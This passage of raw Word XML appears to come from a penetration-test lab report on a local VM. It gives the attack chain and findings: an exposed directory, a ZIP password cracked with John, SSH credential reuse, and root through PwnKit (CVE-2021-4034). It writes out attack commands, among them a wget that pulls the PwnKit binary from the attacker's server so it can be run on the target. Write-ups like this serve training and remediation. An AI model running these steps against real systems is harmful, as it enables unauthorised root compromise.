          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Attack Chain Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following attack chain was executed to achieve full root compromise:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recon: netdiscover + Nmap port scan → identified target at 192.168.56.132 with SSH, HTTP, and Ajenti panel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Enumeration: Nikto + manual browsing → /secret/ directory listing discovered → JPEG images found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File Extraction: ZIP archive downloaded from web, pkzip hash extracted using zip2john, password cracked with John the Ripper (rockyou.txt) → password: 81237900</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7z Extraction: Archive opened with cracked password → Mypasswords.txt retrieved containing credential data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Foothold: SSH banner disclosed username format (employee1, employee2...) → SSH login as employee1 using cracked password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID Enumeration: find / -perm -u=s -type f → identified /usr/bin/pkexec (vulnerable to CVE-2021-4034)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PwnKit Exploitation: Python HTTP server on Kali → wget PwnKit binary on target → chmod +x → execute → root shell obtained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Flag: cat /root/proof.txt → GAIN POWER flag confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding 1 — Apache Directory Listing: /secret/ Exposed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 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)</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http://192.168.56.132/secret/</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Unauthenticated exposure of internal files including a password-protected archive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Apache web server was configured with directory listing enabled on the /secret/ path. This allows any unauthenticated user to enumerate and download all files within that directory. The exposed directory contained multiple JPEG image files as well as a password-protected ZIP archive (secret.zip) containing sensitive credential material.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="3019425"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="secret.png" descr="secret.png" title="secr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194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6 — /secret/ directory listing exposed via Apache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding 2 — Sensitive File Exposure (Password-Protected ZIP)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(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)</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http://192.168.56.132/secret/secret.zip (inferred from web)</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 extracted from ZIP archive, enabling offline cracking attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The secret.zip archive was accessible via the exposed /secret/ directory. Although password-protected, the ZIP file format stores enough metadata for offline hash extraction. The file was exfiltrated and its pkzip hash extracted using zip2john for offline cracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="819150"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="zip_file.png" descr="zip_file.png" title="zip_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8191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7 — zip_file: secret.zip identified in directory listing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="876300"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="zip2john.png" descr="zip2john.png" title="zip2joh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8763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8 — zip2john: PKZIP hash extracted from secret.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="504825"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="cat_secret.png" descr="cat_secret.png" title="cat_secr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048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9 — cat secret: pkzip hash content extracted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding 3 — Weak Archive Password / Credential Reuse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 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)</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secret.zip / SSH service</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password cracked in under 1 second; same password grants SSH access as employee1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper successfully cracked the pkzip password hash against the rockyou.txt wordlist in under one second. The recovered password was 81237900. This same password was reused as the SSH login credential for the employee1 user account, enabling direct system access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="771525"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="john.png" descr="john.png" title="joh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7715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10 — John the Ripper: Password cracked as 81237900</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="1743075"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="7z.png" descr="7z.png" title="7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7430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11 — 7z: Archive extraction with recovered password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="161925"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="secret_zip.png" descr="secret_zip.png" title="secret_z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619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12 — secret.zip contents revealed after extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding 4 — SSH Banner Information Disclosure (Username Enumeration)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 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)</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SSH service — port 22</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Unauthenticated disclosure of username format enabling targeted brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The SSH service displayed a custom MOTD banner visible before authentication. This banner explicitly disclosed the username format used across the system ("employee1, employee2, ... so on"), providing a roadmap for targeted authentication attacks. Combined with the cracked password, this banner enabled direct login as employee1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="2152650"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="banner_grabbing.png" descr="banner_grabbing.png" title="banner_grabb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526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13 — SSH banner: Username format disclosed pre-authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="1943100"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="ssh_login.png" descr="ssh_login.png" title="ssh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9431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14 — SSH login: Successful access as employee1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="304800"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="employee1.png" descr="employee1.png" title="employe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048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15 — whoami: Confirmed initial foothold as employee1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding 5 — Privilege Escalation via PwnKit Binary (CVE-2021-4034)</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CVSS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 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)</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CVE</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CVE-2021-4034</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/usr/bin/pkexec (SUID binary)</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Low-privileged user escalates to root without requiring a password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-4034, known as PwnKit, is a critical privilege escalation vulnerability in the pkexec component of PolicyKit (polkit). The vulnerable binary was discovered via SUID enumeration. The PwnKit exploit binary was transferred to the target via a Python HTTP server running on the attacker's Kali machine and downloaded using wget. After making the binary executable, running ./PwnKit instantly escalated privileges to root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps taken:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID enumeration identified /usr/bin/pkexec as a vulnerable SUID binary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Python HTTP server started on Kali: python -m http.server 8999</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit binary downloaded on target: wget http://192.168.56.1:8999/PwnKit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary made executable: chmod +x PwnKit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit executed: ./PwnKit → immediate root shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="2019300"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="perm.png" descr="perm.png" title="pe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0193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16 — SUID enumeration: /usr/bin/pkexec identified</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="571500"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="binaries.png" descr="binaries.png" title="bina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5715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17 — Binaries directory: PwnKit and enumeration tools staged</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="609600"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="python_server__1_.png" descr="python_server__1_.png" title="python_server__1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6096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18 — Python HTTP server: Serving PwnKit from Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="1457325"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="PwnKit.png" descr="PwnKit.png" title="PwnK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4573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19 — wget: PwnKit binary downloaded to target /tmp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="304800"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="chmod_Pwnkit.png" descr="chmod_Pwnkit.png" title="chmod_Pwnk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048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20 — chmod +x PwnKit then execute: Root shell obtained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="1143000"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="home_directory__1_.png" descr="home_directory__1_.png" title="home_directory__1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1430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21 — Root shell: /home directory listing as root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="12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00"/>
